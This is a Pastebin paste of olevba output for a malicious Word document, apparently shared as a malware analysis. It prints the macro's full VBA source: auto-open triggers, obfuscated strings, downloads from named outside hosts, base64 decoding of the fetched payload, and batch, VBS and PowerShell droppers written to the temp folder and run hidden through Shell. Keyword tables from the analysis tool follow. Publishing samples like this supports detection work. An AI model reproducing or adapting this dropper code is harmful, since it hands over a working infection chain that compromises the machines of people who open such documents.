API tools faq
paste
dynamoo

Malicious Word macro

dynamoo
Jul 16th, 2015
606
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 15.20 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS-HB- total_~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: total_~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: total_~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Dqwkdojqwiodqw_Open()
  16.      
  17. End Sub
  18. Sub Ejoqiwjdioqwjdqo_Open()
  19.      
  20. End Sub
  21. Sub Auto_Open()
  22.     Djiqowjdwoiqjdqwo
  23. End Sub
  24. Sub Djiqowjdwoiqjdqwo()
  25.     UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
  26.     Xjqwidjowqjdq
  27. End Sub
  28. Sub Giqjwdhqwkjq()
  29.     DQUHWDIWQ = "eji21h ui21he21"
  30. End Sub
  31.  
  32. Sub AutoOpen()
  33.     Auto_Open
  34. End Sub
  35. Sub Workbook_Open()
  36.     NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
  37.     Auto_Open
  38. End Sub
  39.  
  40. Sub Xjqwidjowqjdq()
  41.  
  42.    
  43.     Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
  44.     Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
  45.     BOLIVIA = Chr(90 + 2)
  46.    
  47.    
  48.     ANGOLA = Ubqhwdhwqbd(15425) + ""
  49.     SPAIN = Chr(84) & "em" + "p"
  50.     QHDQUWH = ANGOLA
  51.     FL2 = QHDQUWH
  52.     PH2 = Module2.Goabc(SPAIN) + BOLIVIA
  53.    
  54.     silkroad = 9
  55.     jwnqdw = -1
  56.    
  57.     BOSNIA = 12312312
  58.     BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
  59.     BALAGAN = BOSNIA
  60.    
  61.  
  62.     TROYA = "bajh21ejk1h21hejk12h ejk21ht"
  63.     JWIDJIAAA = ""
  64.     HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
  65.     QIWJDABB = "b"
  66.     HUYFEA = QIWJDABB + "a" + "t"
  67.     IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
  68.     PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
  69.    
  70.     gana = NUqwdqwbdsad(1 - 300 * Sin(20))
  71.     SSS = Chr(BALAGAN + 2 + gana)
  72.     VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
  73.     BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
  74.    
  75.     INTG = "" & "o" & "bject"
  76.     KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "d" + "" + "ul" + "e"
  77.     AFTG = Chr(109) & KIWD
  78.    
  79.     SXEE = Chr(46)
  80.     SXAA = Chr(101)
  81.     SXE = SXEE & SXAA & "" & "xe"
  82.     GNG = Chr(2 ^ 2 + 42) + "jpg"
  83.    
  84.    
  85.    
  86.     HUQD = Chr(30 + 16 + 1)
  87.     ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
  88.     BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
  89.      
  90.     PSPTH = PH2 + PSFL
  91.     VBPTH = PH2 + VBFL
  92.     BAPTH = "qhwdqwui 21u eg1ygueyg21 "
  93.     ABPTH = PH2 + BAFL
  94.     BAPTH = ABPTH
  95.     JHQKWDQAASS = BQHJDQ
  96.    
  97.     Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
  98.    
  99.     DRT = 315
  100.     BFT = 316
  101.     CFT = 317
  102.     DFT = 318
  103.     EFT = 319
  104.     Dim NUWDHUQHUQWDH As String
  105.     NUWDHUQHUQWDH = "USE" & "RPROFILE"
  106.     Dim PBIn As String, asdwq As String, MIWDWQ As String
  107.    
  108.    
  109.    
  110.     TSTS = "." + "t" + "xt"
  111.     CDDD = "78672738612836" + TSTS
  112.     LNSS = "papa" + TSTS
  113.     STT1 = "thereis.staging.nodeproduction.com/w" + "p-con" + "tent/uplo" + "ads/"
  114.     STT2 = "www.buildingwalls.co.za/w" + "p-con" + "tent/t" + "hemes/corporate-10/"
  115.  
  116.  
  117.     PBIn = ATTH + STT1 + CDDD
  118.     CONT = Module2.Linolium(PBIn)
  119.      
  120.     asdwq = Rasdas(CONT)
  121.    
  122.     HQUWDAAA = "0"
  123.     If (asdwq <> "=") Then
  124.         PBIn = ATTH + STT2 + CDDD
  125.         CONT = Module2.Linolium(PBIn)
  126.         asdwq = CONT
  127.         HQUWDAAA = "1"
  128.     End If
  129.    
  130.     CONT = Quqhwdbyas(asdwq)
  131.      
  132.     Dim ahuywdgqy As String
  133.      
  134.     TVT10 = Port(CONT, "t" + "ext10")
  135.     TVT20 = Port(CONT, "text20")
  136.     TVT21 = Port(CONT, "text21")
  137.     TVT30 = Port(CONT, "text30")
  138.     TVT31 = Port(CONT, "text31")
  139.     XPT1 = Port(CONT, "stext1")
  140.     XPT2 = Port(CONT, "stext2")
  141.     XPT3 = Port(CONT, "stext3")
  142.    
  143.    
  144.     WVR = Module2.Goabc(NUWDHUQHUQWDH)
  145.     hufehu1 = InStr(WVR, "sers\")
  146.    
  147.     Dim hudhw As Integer
  148.     Dim ghdAdd(1 To 3)
  149.     ghdAdd(1) = "1"
  150.     ghdAdd(2) = "0"
  151.     ghdAdd(3) = "0"
  152.    
  153.     If (hufehu1 <> 0) Then
  154.         ghdAdd(1) = "2"
  155.     Else
  156.         ghdAdd(2) = "3"
  157.     End If
  158.  
  159.  
  160.     JHWQUD = Join(ghdAdd)
  161.     hudhw = Val(JHWQUD)
  162.    
  163.     Module2.WaitFor (1)
  164.    
  165.     MIWDWQ = ATTH + STT1 + LNSS
  166.     If (HQUWDAAA = "1") Then
  167.         MIWDWQ = ATTH + STT2 + LNSS
  168.     End If
  169.    
  170.     SEXX = Module2.Linolium(MIWDWQ)
  171.    
  172.     PSTB = PBIn + "123123123"
  173.     MSTAR1 = JHQKWDQAASS + "5751812" + GNG
  174.     MSTAR2 = JHQKWDQAASS + "5757956" + GNG
  175.     STAR1 = ATTH + MSTAR1
  176.     STAR2 = ATTH + MSTAR2
  177.     FFQ = "8"
  178.     FF = FFQ + SXE
  179.    
  180.      If (hudhw = 130) Then
  181.      Open BAPTH For Output As #DRT
  182.      Print #DRT, XPT1
  183.      Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
  184.      Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
  185.      Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
  186.      Print #DRT, XPT2
  187.      Close #DRT
  188.      
  189.      Module2.WaitFor (1)
  190.      
  191.      Open VBPTH For Output As #BFT
  192.      Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
  193.      Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
  194.      Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
  195.      Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
  196.      Print #BFT, XPT3
  197.      Close #BFT
  198.      
  199.      BDDT.WaitFor (1)
  200.      NTH1 = Module3.HowEver(retVal, BAPTH)
  201.      
  202.      End If
  203.      
  204.      
  205.      HUDQG = "';"
  206.      
  207.      
  208.      
  209.       If (hudhw = 200) Then
  210.        
  211.      ZPQSKD = FL2
  212.      Open PSPTH For Output As #CFT
  213.      Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
  214.      Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
  215.      Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
  216.      Print #CFT, "$ggtt = '" + SEXX + "';"
  217.      Print #CFT, "$pths = '" + PH2 + HUDQG
  218.      
  219.      Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
  220.      Print #CFT, "$nnm = '" + FFQ + "';"
  221.      Print #CFT, TVT10
  222.      Close #CFT
  223.      
  224.      Open VBPTH For Output As #DFT
  225.      Print #DFT, TVT30
  226.      Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
  227.      Print #DFT, TVT31
  228.      Close #DFT
  229.    
  230.      Open BAPTH For Output As #EFT
  231.      Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
  232.      Print #EFT, TVT20
  233.      Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
  234.      Print #EFT, ":nqudiiqhdjkashd"
  235.      Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
  236.      Print #EFT, ":nqjdkbjkbdhjqwb"
  237.      Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
  238.      Print #EFT, TVT21
  239.      Close #EFT
  240.      Module2.WaitFor (1)
  241.      
  242.      NTH2 = Module3.HowEver(retVal, BAPTH)
  243.      
  244.      End If
  245.      
  246.     JUW = Chr(47)
  247.     AKK = Chr(60)
  248.     ZKK = ">"
  249.     NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
  250.     NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
  251.     NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
  252.     NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
  253.     NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
  254.     NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
  255.    
  256. End Sub
  257.  
  258.  
  259. Public Function NUqwdqwbdsad(a As Integer)
  260. NUqwdqwbdsad = Sgn(a)
  261. End Function
  262.  
  263. Public Function Ubqhwdhwqbd(a As Integer)
  264. Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
  265. End Function
  266.  
  267.  
  268. Public Function Quqhwdbyas(ByVal strData As String) As String
  269.     Dim objXML As Object
  270.     Dim objNode As Object
  271.     Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
  272.     nudqwd = Log10(100)
  273.     asduiwhqdqiw = NUqwdqwbdsad(1 - nudqwd)
  274.     QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
  275.     Set objXML = CreateObject(QHDHUQW)
  276.     Set objNode = objXML.createElement("b6" + "4")
  277.     objNode.DataType = "bin.b" + Chr(97) + "se" + "64" & ""
  278.     objNode.Text = strData
  279.     WUDHA = objNode.nodeTypedValue
  280.     Quqhwdbyas = WUDHA
  281.     Set objNode = Nothing
  282.     Set objXML = Nothing
  283. End Function
  284.  
  285. Public Function Port(a, b As String)
  286. Dim krd, tent As Integer
  287. UQWD = "" & Chr(58 + 2)
  288. NDUW = "" & Chr(70 - 8)
  289. krd = InStr(1, a, UQWD + b + NDUW) + 8
  290. tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
  291. KLMN = Mid$(a, krd, tent)
  292. HUQHWDA = KLMN
  293. Port = HUQHWDA
  294. End Function
  295.  
  296. Private Static Function Rasdas(a As String)
  297. Rasdas = Right(a, 1)
  298. End Function
  299.  
  300.  
  301. Private Static Function Log10(x)
  302. SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
  303. Log10 = Log(x) / Log(10#)
  304. End Function
  305.  
  306.  
  307.  
  308.  
  309.  
  310.  
  311.  
  312.  
  313.  
  314.  
  315.  
  316.  
  317.  
  318. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  319. ANALYSIS:
  320. +------------+----------------+-----------------------------------------+
  321. | Type       | Keyword        | Description                             |
  322. +------------+----------------+-----------------------------------------+
  323. | AutoExec   | AutoOpen       | Runs when the Word document is opened   |
  324. | AutoExec   | Auto_Open      | Runs when the Excel Workbook is opened  |
  325. | AutoExec   | Workbook_Open  | Runs when the Excel Workbook is opened  |
  326. | Suspicious | Open           | May open a file                         |
  327. | Suspicious | Chr            | May attempt to obfuscate specific       |
  328. |            |                | strings                                 |
  329. | Suspicious | CreateObject   | May create an OLE object                |
  330. | Suspicious | Output         | May write to a file (if combined with   |
  331. |            |                | Open)                                   |
  332. | Suspicious | Print #        | May write to a file (if combined with   |
  333. |            |                | Open)                                   |
  334. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  335. |            |                | be used to obfuscate strings (option    |
  336. |            |                | --decode to see all)                    |
  337. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  338. |            |                | may be used to obfuscate strings        |
  339. |            |                | (option --decode to see all)            |
  340. +------------+----------------+-----------------------------------------+
  341. -------------------------------------------------------------------------------
  342. VBA MACRO Module1.bas
  343. in file: total_~1.doc - OLE stream: u'Macros/VBA/Module1'
  344. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  345. Public Function Xjdkhjfwefw(a As Object)
  346. XjdkhjfwefwSAD = "jh2ekjg12 jh12"
  347. Xjdkhjfwefw = a.responsetext
  348. End Function
  349.  
  350. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  351. ANALYSIS:
  352. No suspicious keyword or IOC found.
  353. -------------------------------------------------------------------------------
  354. VBA MACRO Module2.bas
  355. in file: total_~1.doc - OLE stream: u'Macros/VBA/Module2'
  356. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  357.  
  358. Public Function Goabc(sps As String)
  359. BQHGDWJQW = "hqjwkhdjk12h 1gh" + "12jebmn21b enm12"
  360. BQHGDWJQW = "hqjwkhdjk12h 1gh" + "12jebmn21b enm12"
  361. BQHGDWJQW = "hqjwkhdjk12h 1gh" + "12jebmn21b enm12"
  362. Goabc = Environ(sps)
  363. End Function
  364. Public Function Linolium(nbqjbdjqw As String)
  365. Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
  366. Dim ashdUHhda As String
  367. ashdUHhda = nbqjbdjqw
  368. BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(34 Mod 7 + 4 / 2 ^ 2 + 77) & Chr(84) & Chr(80)
  369. 'MsgBox (BQDHJQWDGWQJGS)
  370. Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
  371. Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
  372. Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
  373. Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
  374. End Function
  375. Sub WaitFor(NumOfSeconds As Long)
  376. Dim SngSec As Long
  377. SngSec = Timer + NumOfSeconds
  378. Do While Timer < SngSec
  379. DoEvents
  380. Loop
  381. End Sub
  382.  
  383.  
  384.  
  385.  
  386.  
  387.  
  388.  
  389.  
  390.  
  391.  
  392.  
  393.  
  394.  
  395.  
  396.  
  397.  
  398. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  399. ANALYSIS:
  400. +------------+--------------+-----------------------------------------+
  401. | Type       | Keyword      | Description                             |
  402. +------------+--------------+-----------------------------------------+
  403. | Suspicious | Open         | May open a file                         |
  404. | Suspicious | Chr          | May attempt to obfuscate specific       |
  405. |            |              | strings                                 |
  406. | Suspicious | CreateObject | May create an OLE object                |
  407. | Suspicious | Environ      | May read system environment variables   |
  408. +------------+--------------+-----------------------------------------+
  409. -------------------------------------------------------------------------------
  410. VBA MACRO Module3.bas
  411. in file: total_~1.doc - OLE stream: u'Macros/VBA/Module3'
  412. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  413.  
  414.  
  415. Public Function India(dnuwhd As String, b As String, c As Integer)
  416. Dim selectedText As String
  417. Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
  418. Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
  419. RHQHDQWUHDQKW = "h 1j2he kh12jgh12 feg21fgeh12fjy"
  420. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  421. With ssjidoqwhduqhwidqwudihq.Find
  422. 'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  423. 'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  424. .Text = dnuwhd
  425. .MatchWholeWord = True
  426. ssjidoqwhduqhwidqwudihq.Find.Execute
  427. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
  428. Dim wdwq As String
  429. Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
  430. Dim wdsadwq As String
  431. lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
  432. .Text = b
  433. .MatchWholeWord = True
  434. .Execute
  435. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  436. RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  437. ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
  438. lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
  439.  
  440. If (c = 1) Then
  441.     selectedText = lesleslesqjhdjqkwhdwq.Delete
  442. End If
  443. If (c = 2) Then
  444.     lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
  445. End If
  446.  
  447. Dim hduwaa As Integer
  448. hduwaa = 1 - 423
  449.  
  450. QHUDW = Chr(33 + Sgn(hduwaa))
  451.  
  452. If (c = 3) Then
  453.     With ssjidoqwhduqhwidqwudihq.Find
  454.     .Text = a
  455.     .Replacement.Text = QHUDW
  456.     'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  457.    'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  458.    'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  459.    'RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
  460.    .Wrap = wdFindContinue
  461.     .Execute Replace:=wdReplaceAll
  462.     End With
  463. End If
  464.  
  465. End With
  466. End Function
  467.  
  468. Public Function HowEver(a As Variant, b)
  469. CJQIWDJQWD = "12jekh1 hj1k2 ehj12k"
  470. a = Shell(b, 0)
  471. HowEver = a
  472. End Function
  473.  
  474.  
  475.  
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483.  
  484.  
  485.  
  486.  
  487. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  488. ANALYSIS:
  489. +------------+---------+-----------------------------------------+
  490. | Type       | Keyword | Description                             |
  491. +------------+---------+-----------------------------------------+
  492. | Suspicious | Chr     | May attempt to obfuscate specific       |
  493. |            |         | strings                                 |
  494. | Suspicious | Shell   | May run an executable file or a system  |
  495. |            |         | command                                 |
  496. +------------+---------+-----------------------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!